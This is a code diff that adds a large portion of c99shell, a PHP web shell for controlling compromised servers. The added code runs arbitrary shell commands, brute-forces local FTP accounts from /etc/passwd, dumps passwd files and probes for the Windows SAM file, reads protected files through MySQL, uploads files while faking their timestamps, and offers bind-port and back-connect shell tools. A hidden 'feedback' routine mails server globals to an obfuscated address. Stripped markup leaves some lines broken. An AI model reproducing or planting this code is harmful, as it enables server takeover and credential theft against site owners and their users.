+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "
    Server variables:

    ";
+     echo "";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
+     echo "
    NameValue
    ".$row[0]."".$row[1]."
    ";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "
    Processes:

    ";
+     echo "";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";}
+     echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    ";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "Error in reading file (permision denied)!";}
+      else
+      {
+       for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";}
+       else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "
    ";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "
    Affected rows: ".$affected."
    ";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}
+  echo "

    ";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "Ftp Quick brute:
    ";
+ if (!win) {echo "This functions not work in Windows!

    ";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    ";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    ";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    ";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "

    Read first: 

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    ";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "
    Permision denied!
    ";}
+ else
+ {
+  echo "Directory information:";
+  if (!$win)
+  {
+   echo "
    Owner/Group ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    ";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    ";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "*nix /etc/passwd:
    ";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "
    From:  To:  

    ";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "".$uid["dir"]."";
+     echo join(":",$uid)."
    ";
+    }
+    $i++;
+   }
+  }
+  else {echo "
    Get /etc/passwd
    ";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") 
    ";}
+  else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";}
+ if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";}
+ if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "
    Encoder:
    Input:




    Hashes:
    ";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - 
    ";
+ }
+ echo "
    Url:

    urlencode - 
+ 
    urldecode - 
+ 
    Base64:
    base64_encode - 
    ";
+ echo "
    base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "";}
+  else {$rows++; echo "";}
+  echo " ^";
+ }
+ echo "

    Base convertations:
    dec2hex - 
    ";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "
    Buffer is empty!
    ";}
+ else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+  else {echo "
    Can't delete ".__FILE__."!
    ";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "Error: incorrect confimation!";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "
    Self-remove: ".__FILE__." 
    Are you sure?
    For confirmation, enter \"".$rnd."\"     ";
+ }
+}
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
+ if (!empty($submit))
+ {
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    ";
+ }
+ else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name: 

    Your e-mail: 

    Message:


    Attach server-info * 

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";}
+}
+if ($act == "search")
+{
+ echo "Search in file-system:
    ";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "No files found!";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "
    
+
+Search for (file/folder name):   - regexp
+
    Search in (explode \";\"): 
+

    Text:
    
+

     - regexp
+   - whole words only
+   - case sensitive
+   - find files NOT containing the text
+

    ";
+ if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "Change file-mode with error: can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute    		Group

     Read
     Write
    eXecute    		World

     Read
     Write
    eXecute
    ";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!
    ";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "".$uploadmess."";
+  $act = "ls";
+ }
+ else
+ {
+  echo "File upload:
    ".$uploadmess."
    
+Select file on your local computer: 
                   or
    
+Input URL: 

    
+Save this file dir: 

    
+File-name (auto-fill): 

    
+ convert file name to lovercase

    
+
+
    ";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";}
+ }
+ if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "Result of execution this command:
    ";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "
    ";
+  }
+  else {echo $ret."
    ";}
+  @chdir($olddir);
+ }
+ else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "


     Display in text-area 
    ";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "Name";
+   $row[] = "Size";
+   $row[] = "Modify";
+   if (!$win)
+  {$row[] = "Owner/Group";}
+   $row[] = "Perms";
+   $row[] = "Action";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "";
+   $y .= "\"".($parsesort[1]";
+   $row[$k] .= $y;
+   for($i=0;$i".$row[$i]."";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = ""; $r[3] = "";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = " ".$o."";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = " ".$o."";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  " [".$disppath."]";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  " [".$disppath."]";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  " ".$disppath."";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "".view_perms_color($v)."";
+    if ($o == ".") {$checkbox = ""; $i--;}
+    else {$checkbox = "";}
+    if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;}
+    else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    ";
+  foreach($table as $row)
+  {
+   echo "\r\n";
+   foreach($row as $v) {echo "\r\n";}
+   echo "\r\n";
+  }
+  echo "
    ".$v."
    
+  
+     
+  ";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "                   ";
+  }
+  echo " 
    ";
+  echo "";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "Result of binding port:
    ";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!
    ";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
